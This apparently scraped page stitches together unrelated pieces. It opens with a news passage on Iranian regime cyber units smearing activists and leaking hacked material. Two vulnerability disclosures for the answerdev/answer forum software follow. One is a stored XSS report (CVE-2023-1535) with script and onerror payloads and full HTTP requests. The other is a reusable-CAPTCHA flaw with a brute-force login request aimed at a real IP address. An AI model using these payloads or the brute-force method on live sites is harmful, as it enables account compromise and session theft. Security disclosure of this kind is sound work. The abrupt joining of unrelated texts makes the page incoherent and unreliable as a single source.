A recent study by Hossein Kermani, a political communications researcher at the University of Vienna, outlines the various tactics deployed by the Iranian cyber army that muddy the waters: “Downgrading discussions to the level of the government, justifying the state’s policies, cheering up other users, portraying that everything is normal, redirecting debates, spreading fake news, trending misleading hashtags, and mocking dissidents and activists.”

Some of these strategies were used to accuse the two journalists who covered the death of Mahsa Amini of being Mossad agents, portraying the prominent Iran-based activist Sepideh Qolian as “mentally ill and hysterical,” and pretending to be activists calling for violent uprisings in order to justify violent crackdowns. Pro-regime accounts also mimicked and hijacked anti-regime hashtags, which were subsequently flooded with pro-regime misinformation. And IRI cyber forces boosted the “Do execute” hashtag in response to activists trending “Do not execute” against the string of death penalty verdicts against protesters.

Beyond causing confusion, discrediting and undermining opposition has been an essential component of Iranian cyber activity. This has partially been pursued by hacking opposition figures directly but also through sock puppet accounts, which pit one faction of the opposition against another.

Kargar, of the Atlantic Council, believes that the Iranian cyber response to the recent anti-regime movement signals a smarter and more prudent approach. She describes how regime-affiliated cyber groups hack as much as possible and hold onto their material, sometimes for years, only to release it when it can have maximum effect. These efforts are part of a wider effort to create the impression that nobody is trustworthy and nobody is credible, she says. 

In late 2022, for instance, actress and activist Nazanin Boniadi began publicly collaborating with the son of the former shah, Reza Pahlavi, another popular opposition figure. Amid their attempts to present a unified front against the regime, the IRGC-affiliated hacker group Adl-e Ali sought to sow division by leaking old emails of Boniadi criticizing Pahlavi’s base of staunch monarchist supporters. With Pahlavi seeing a surge of popularity and credibility in the eyes of Western media in recent months, the hacker group has attempted to embarrass and discredit him by leaking old private photos and videos of Pahlavi snoring in his sleep, lying on the beach, and attending parties.

“If you can't win the hearts and minds, you might as well try to make everyone lose hearts and minds in one another. If you can’t win—make everyone else lose. That’s basically how they have been operating,” Kargar says.

While the regime might have lost the battle for the narrative, it has still had some successes, such as the “Judge of Death” distraction. Sabeti, the cybersecurity expert, believes that the case was an attempt by IRI cyber forces to test the waters toward future activities.

“I think it was to maybe the test the waters, to see how they can manage to change the narrative for the next \[execution\],” Sabeti says. “Because everyone knows it’s not the end of the story.”

The Scorched-Earth Tactics of Iran’s Cyber Army

Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.7.

**Description**

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

**Proof of Concept**

Posting the Question:

    func (req *QuestionAdd) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        for _, tag := range req.Tags {
            if len(tag.OriginalText) > 0 {
                tag.ParsedText = converter.Markdown2HTML(tag.OriginalText)
            }
        }
        return nil, nil
    }
    

Updating the Question:

    func (req *QuestionUpdate) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        return nil, nil
    }
    

Posting the Answer:

    func (req *AnswerAddReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        return nil, nil
    }
    

Updating the Answer:

    func (req *AnswerUpdateReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        return nil, nil
    }
    

Updating the Tag:

    func (r *UpdateTagReq) Check() (errFields []*validator.FormErrorField, err error) {
        if len(r.EditSummary) == 0 {
            r.EditSummary = "tag.edit.summary"
        }
        r.ParsedText = converter.Markdown2HTML(r.OriginalText)
        return nil, nil
    }
    

Addning a comment:

    func (req *AddCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.ParsedText = converter.Markdown2HTML(req.OriginalText)
        return nil, nil
    }
    

Updating a Comment:

    func (req *UpdateCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.ParsedText = converter.Markdown2HTML(req.OriginalText)
        return nil, nil
    }
    

Payload:

    <script>alert(1)<\\x00/script>
    <style></style><img src=x onerror=alert(1)//>
    

Request @ Question:

    POST /answer/api/v1/question HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
    Content-Type: application/json
    Content-Length: 213
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/questions/ask
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"title":"question","content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","tags":[{"original_text":"","parsed_text":"","slug_name":"nano","recommend":false,"reserved":false}]}
    

Request @ Answer:

    POST /answer/api/v1/post/render HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
    Content-Type: application/json
    Content-Length: 95
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/questions/10010000000000007
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>\n"}
    

Request @ Tag:

    PUT /answer/api/v1/tag HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
    Content-Type: application/json
    Content-Length: 272
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/tags/10030000000000002/edit
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"display_name":"a","slug_name":"a","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","parsed_text":"<style></style><img src=x onerror=alert(1)//><blockquote>\n</blockquote>\n","tag_id":"10030000000000002","edit_summary":""}
    

Request @ Comment:

    POST /answer/api/v1/comment HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 1d798f13-bda1-11ed-9586-0242ac110002
    Content-Type: application/json
    Content-Length: 158
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/questions/10010000000000012/nadahh
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"object_id":"10020000000000015","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","mention_username_list":[]}
    

**Impact**

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.

CVE-2023-1535: Multiple XSS @ answer/question/tag in answer

Guessable CAPTCHA in GitHub repository answerdev/answer prior to 1.0.6.

**Description**

So if we login incorrectly multiple times, we get captcha. Each captcha has "captcha\_id" and solve "captcha\_code" For example: "captcha\_code":"8awt" "captcha\_id":"7nToXDrT6SkJ2BJxKG1u" You can use same captcha code and captcha id in login without any problem

Captcha is generated with - http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

**Proof of Concept**

Login multiple times and get any captcha Captcha URL: http://34.245.133.152:9080/answer/api/v1/user/action/record?action=login

Type captcha code and login

Your request:

    POST /answer/api/v1/user/login/email HTTP/1.1
    Host: 34.245.133.152:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 
    Content-Type: application/json
    Content-Length: 105
    Origin: http://34.245.133.152:9080
    Connection: close
    Referer: http://34.245.133.152:9080/users/login
    
    {"e_mail":"sdad@gmail.com","pass":"sdadssadda","captcha_code":"8awt","captcha_id":"7nToXDrT6SkJ2BJxKG1u"}
    ----------------------------------------------------------------
    
    Use this request as long as you want, with same captcha_code and same captcha_id
    
    Response you will get each time:
    ----------------------------------------------------------------
    HTTP/1.1 400 Bad Request
    Content-Type: application/json; charset=utf-8
    Date: Tue, 21 Feb 2023 12:44:12 GMT
    Content-Length: 186
    Connection: close
    
    {"code":400,"reason":"error.object.email_or_password_incorrect","msg":"Email and password do not match.","data":[{"error_field":"e_mail","error_msg":"Email and password do not match."}]}
    

You can use burpsuite and send it to intruder and add wordlist then check with 1000 requests. Result will be same.

**Impact**

The security measure is to require the user to solve a captcha after multiple failed login attempts. The captcha includes a "captcha\_code," which is the code the user must enter to prove they are human, and a "captcha\_id," which is a unique identifier for that particular captcha. Once a attacker solves 1 captcha, they can use the same "captcha\_code" and "captcha\_id" for subsequent login attempts without any issue.

Tag

#intel